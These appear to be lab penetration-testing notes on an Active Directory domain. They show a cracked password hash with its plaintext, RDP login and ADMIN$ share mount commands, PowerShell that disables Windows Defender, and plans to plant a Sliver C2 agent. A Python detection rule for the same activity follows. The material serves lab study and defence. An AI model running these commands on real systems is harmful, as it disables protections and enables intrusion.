## `robb.stark`

- we can use `-x` on [[winterfell]] - RCE
	- next up, let's go through same steps to deploy a sliver agent on the remote system
	- do keep in mind that this fucker has windows defender enabled tho...
		- we can either go disable this through azure
		- or see if we can bypass it somehow, perhaps just using LOL techniques
- Dude's got `R:W` on `ADMIN$` share on the DC <3
	- he's admin, we basically just rooted the freakin thing

We crack da hash:

```
831486ac7f26860c9e2f51ac91e1a07a:sexywolfy
```

We can now RDP onto the host:

```
xfreerdp /u:robb.stark /p:sexywolfy /d:north.sevenkingdoms.local /v:winterfell
```

Host has windows defender enabled, let's disable that:

```
Get-MpPreference | Select-Object -Property DisableRealtimeMonitoring
# false
Set-MpPreference -DisableRealtimeMonitoring $true
Get-MpPreference | Select-Object -Property DisableRealtimeMonitoring
# true
```

After that we'll go about downloading an additional sliver payload onto the machine.

Mount dat ADMIN$ share:

```sh
sudo mount -t cifs //192.168.56.22/ADMIN$ /mnt/winterfell-admin -o username=robb.stark,password=sexywolfy,domain=north.sevenkingdoms.local,vers=4.0
```
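Blue-team view of the steps above, as an added example that is not part of the original notes: a small correlation rule that flags `ADMIN$` access on a host shortly after Defender real-time protection was switched off there (Defender events 5000/5001, Security event 5140). The event records are constructed, and their flat field names, `svc.backup`, `otherhost` and the source IP are assumptions for illustration.

```python
from datetime import datetime, timedelta

RTP_ENABLED, RTP_DISABLED = 5000, 5001   # Defender operational log
SHARE_ACCESS = 5140                      # Security log: network share accessed

# Constructed sample events. Field names are a simplified, assumed schema,
# not raw Windows event XML; svc.backup, otherhost and src_ip are made up.
SAMPLE_EVENTS = [
    {"time": "2024-01-01T10:00:05", "host": "winterfell", "id": 4624,
     "user": "robb.stark", "logon_type": 10, "src_ip": "192.168.56.100"},
    {"time": "2024-01-01T10:02:40", "host": "winterfell", "id": RTP_DISABLED},
    {"time": "2024-01-01T10:06:12", "host": "winterfell", "id": SHARE_ACCESS,
     "user": "robb.stark", "share": r"\\*\ADMIN$", "src_ip": "192.168.56.100"},
    {"time": "2024-01-01T10:07:00", "host": "otherhost", "id": SHARE_ACCESS,
     "user": "svc.backup", "share": r"\\*\ADMIN$", "src_ip": "192.168.56.100"},
]


def defender_off_then_admin_share(events, window=timedelta(minutes=30)):
    """Alert when ADMIN$ is accessed on a host within `window` after Defender
    real-time protection was disabled there and not yet re-enabled."""
    rtp_off = {}  # host -> time real-time protection was last disabled
    alerts = []
    for ev in sorted(events, key=lambda e: datetime.fromisoformat(e["time"])):
        ts, host = datetime.fromisoformat(ev["time"]), ev["host"]
        if ev["id"] == RTP_DISABLED:
            rtp_off[host] = ts
        elif ev["id"] == RTP_ENABLED:
            rtp_off.pop(host, None)  # protection restored, stop tracking
        elif ev["id"] == SHARE_ACCESS and ev.get("share", "").upper().endswith("ADMIN$"):
            off = rtp_off.get(host)
            if off is not None and ts - off <= window:
                alerts.append({"host": host, "user": ev.get("user"),
                               "src_ip": ev.get("src_ip"),
                               "rtp_disabled_at": off.isoformat(),
                               "share_access_at": ts.isoformat()})
    return alerts


if __name__ == "__main__":
    for alert in defender_off_then_admin_share(SAMPLE_EVENTS):
        print(alert)
```

The 4624 type 10 (RDP) logon in the sample is ignored by the rule but is the record to pivot to when an alert fires, since the 5001 event itself does not name the interactive user.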